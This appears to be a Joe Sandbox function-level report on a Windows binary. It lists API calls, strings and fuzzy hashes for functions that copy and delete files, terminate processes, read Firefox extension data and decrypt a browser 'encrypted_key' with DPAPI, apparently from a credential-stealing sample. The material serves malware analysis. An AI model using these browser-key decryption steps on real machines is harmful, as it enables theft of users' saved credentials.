Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1823113695-4289949731
Opcode ID: 8bc8b04e7c708a71d78fea1ab9a4a4174222eb9c20757c11fe6e745b671b0a65
Instruction ID: fd5487995619ea80a741ab4b378bbf928d113e675d4cf270dc91abfc69121cc8
Opcode Fuzzy Hash: 8bc8b04e7c708a71d78fea1ab9a4a4174222eb9c20757c11fe6e745b671b0a65
Instruction Fuzzy Hash: 7ED012B1A1020DBBCB04E7D8DC169DEB6E99B45710F100179B706E3641EAB096004565

Function 00091D61 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00092301,?), ref: 00091D6C
HeapAlloc.KERNEL32(00000000), ref: 00091D73
wsprintfW.USER32 ref: 00091D84

Strings

%hs, xrefs: 00091D7E

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesswsprintf
String ID: %hs
API String ID: 659108358-2783943728
Opcode ID: 40167744c2ec842120271906248ff4332908e05dbcc9064b47f0d2508db7d23f
Instruction ID: 0c8d607c77af6aae5ebbd89181b9dcbee5a4f4be203128e2d7770ae32e6f8d0a
Opcode Fuzzy Hash: 40167744c2ec842120271906248ff4332908e05dbcc9064b47f0d2508db7d23f
Instruction Fuzzy Hash: 39D09E7174521477E65027D5AC0DBDB7F28DB056A2F000121FB0D96291D96A455447D5

Function 000813F6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00081402
GetDeviceCaps.GDI32(00000000,0000000A), ref: 0008140D
ReleaseDC.USER32(00000000,00000000), ref: 00081416

Strings

DISPLAY, xrefs: 000813FD

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: CapsCreateDeviceRelease
String ID: DISPLAY
API String ID: 1843228801-865373369
Opcode ID: 51c95787c4ceea8051c870d6c58fbc3e886902eb11e0d29e6bf4e9f3f5a8149f
Instruction ID: c1ac2fed3e8307b73a43b2bbeed253eb9b10fb2dc0c2adf9709e18dbe81fec43
Opcode Fuzzy Hash: 51c95787c4ceea8051c870d6c58fbc3e886902eb11e0d29e6bf4e9f3f5a8149f
Instruction Fuzzy Hash: 14D002357D4344BBF2702B65BD4EFAB2A64E7C6F52F200214F706B91E48AB814469637

Function 0008B021 Relevance: 6.2, APIs: 4, Instructions: 222filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

Part of subcall function 00091C4A: GetSystemTime.KERNEL32(?,000B6701,?), ref: 00091C79

Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650

Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF

Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD

CopyFileA.KERNEL32(?,?,00000001), ref: 0008B0C6
lstrlenA.KERNEL32(?), ref: 0008B27C
lstrlenA.KERNEL32(?), ref: 0008B297
DeleteFileA.KERNEL32(?), ref: 0008B2E9

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: bd3a7af956602fe7c6df1c4612860134c2d971d66425bd02e4424b64dc609b62
Instruction ID: 82c337f311d2267f5372d80b9cc1be68e6c9f398c62097818836d8c2486a166a
Opcode Fuzzy Hash: bd3a7af956602fe7c6df1c4612860134c2d971d66425bd02e4424b64dc609b62
Instruction Fuzzy Hash: F881A232900119EFCF01FBA4ED469DEB7B5FF14301F614061F990BB162DB60AE5A9BA1

Function 0008B332 Relevance: 6.2, APIs: 4, Instructions: 196filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

Part of subcall function 00091C4A: GetSystemTime.KERNEL32(?,000B6701,?), ref: 00091C79

Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650

Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF

Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD

CopyFileA.KERNEL32(?,?,00000001), ref: 0008B3D7
lstrlenA.KERNEL32(?), ref: 0008B529
lstrlenA.KERNEL32(?), ref: 0008B544
DeleteFileA.KERNEL32(?), ref: 0008B596

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 93377c27713344c10494467baf2127bdc2ec06e84b885829d9f7ff3d5354428d
Instruction ID: 10c2ffae1ac1a12eb9351b31c0db27f1dd1339ac6d15a30f042ef09f7221f004
Opcode Fuzzy Hash: 93377c27713344c10494467baf2127bdc2ec06e84b885829d9f7ff3d5354428d
Instruction Fuzzy Hash: 0171B032900119EFCF01FBA4ED469DEBBB5FF14301F514061F994BB162DB20AE5A9BA1

Function 0008D40E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 125stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00090519: lstrcpyA.KERNEL32(00000000,?,?,00081D07,?,00097621), ref: 00090538

Part of subcall function 00087FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0008E756,?,?,?), ref: 00087FC7
Part of subcall function 00087FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0008E756,?,?,?), ref: 00087FDE
Part of subcall function 00087FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0008E756,?,?,?), ref: 00087FF5
Part of subcall function 00087FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0008E756,?,?,?), ref: 0008800C
Part of subcall function 00087FAC: CloseHandle.KERNEL32(?,?,?,?,?,0008E756,?,?,?), ref: 00088034

Part of subcall function 00091E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00096931,?), ref: 00091E37

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650

Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD

Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF

StrStrA.SHLWAPI(00000000,?,000B7538,000B688A), ref: 0008D49F
lstrlenA.KERNEL32(?), ref: 0008D4B2

Strings

moz-extension+++, xrefs: 0008D4DD
^userContextId=4294967295, xrefs: 0008D4D7

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 161838763-3310892237
Opcode ID: e0836899140569493d06ff7fddc326c9d6cb804f093d4c3d3c4da8bc47f16dbd
Instruction ID: 2f25bfb6aeda77cd176e72154bce159cab80c1a739bb59564867c974e9f163b2
Opcode Fuzzy Hash: e0836899140569493d06ff7fddc326c9d6cb804f093d4c3d3c4da8bc47f16dbd
Instruction Fuzzy Hash: 5241B236900519AFCF11FBA8E9469CEB7B4BF04304F520161FD84B7263DB64AE199BE1

Function 0009BD80 Relevance: 6.1, APIs: 4, Instructions: 91fileCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 0009BDC5
_memmove.LIBCMT ref: 0009BDD9
_memmove.LIBCMT ref: 0009BE26
WriteFile.KERNEL32(?,?,?,?,00000000,?,?,00000001,?,?,0009AE6B,?,00000001,?,?,?), ref: 0009BE45

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: _memmove$FileWritemalloc
String ID:
API String ID: 803809635-0
Opcode ID: 448cd1c11911de21be95e00c674f368f9db996482e5187549b183c61790f1adc
Instruction ID: 408375fd8368af350d1ed98220313b331dec3fa44f955d1f4b680c393d81f582
Opcode Fuzzy Hash: 448cd1c11911de21be95e00c674f368f9db996482e5187549b183c61790f1adc
Instruction Fuzzy Hash: CD317071600704AFDB61CF55EA84BABB7F8FB44754F40852EE54687A01DB70F9049B50

Function 000922B0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000922D7

Part of subcall function 00091D61: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00092301,?), ref: 00091D6C
Part of subcall function 00091D61: HeapAlloc.KERNEL32(00000000), ref: 00091D73
Part of subcall function 00091D61: wsprintfW.USER32 ref: 00091D84

OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 0009237D
TerminateProcess.KERNEL32(00000000,00000000), ref: 0009238B
CloseHandle.KERNEL32(00000000), ref: 00092392

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocCloseHandleOpenTerminate_memsetwsprintf
String ID:
API String ID: 2224742867-0
Opcode ID: cb76572742cc54d0269feb866d40d14be18e98a58626cbc0f53e87c93e11a848
Instruction ID: 74db7d5bc7e8d430fdbb9e3d9b5ae543171df66e9b6b36cd33d5bb66e8147481
Opcode Fuzzy Hash: cb76572742cc54d0269feb866d40d14be18e98a58626cbc0f53e87c93e11a848
Instruction Fuzzy Hash: AC314172A01218AFDF209FA0DC889EEB7BCEF0A344F0444A6F509E6551D7349F859F52

Function 0008819F Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

Part of subcall function 00087FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0008E756,?,?,?), ref: 00087FC7
Part of subcall function 00087FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0008E756,?,?,?), ref: 00087FDE
Part of subcall function 00087FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0008E756,?,?,?), ref: 00087FF5
Part of subcall function 00087FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0008E756,?,?,?), ref: 0008800C
Part of subcall function 00087FAC: CloseHandle.KERNEL32(?,?,?,?,?,0008E756,?,?,?), ref: 00088034

Part of subcall function 00091E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00096931,?), ref: 00091E37

StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0008CC90,?,?), ref: 000881E5

Part of subcall function 00088048: CryptStringToBinaryA.CRYPT32(00086724,00000000,00000001,00000000,?,00000000,00000000), ref: 00088060
Part of subcall function 00088048: LocalAlloc.KERNEL32(00000040,?,?,?,00086724,?), ref: 0008806E
Part of subcall function 00088048: CryptStringToBinaryA.CRYPT32(00086724,00000000,00000001,00000000,?,00000000,00000000), ref: 00088084
Part of subcall function 00088048: LocalFree.KERNEL32(?,?,?,00086724,?), ref: 00088093

Part of subcall function 000880A1: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0008823B), ref: 000880C4
Part of subcall function 000880A1: LocalAlloc.KERNEL32(00000040,0008823B,?,?,0008823B,0008CB95,?,?,?,?,?,?,?,0008CC90,?,?), ref: 000880D8
Part of subcall function 000880A1: LocalFree.KERNEL32(0008CB95,?,?,0008823B,0008CB95,?,?,?,?,?,?,?,0008CC90,?,?), ref: 000880FD

Strings

, xrefs: 00088241
"encrypted_key":", xrefs: 000881DF
DPAPI, xrefs: 0008821B

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

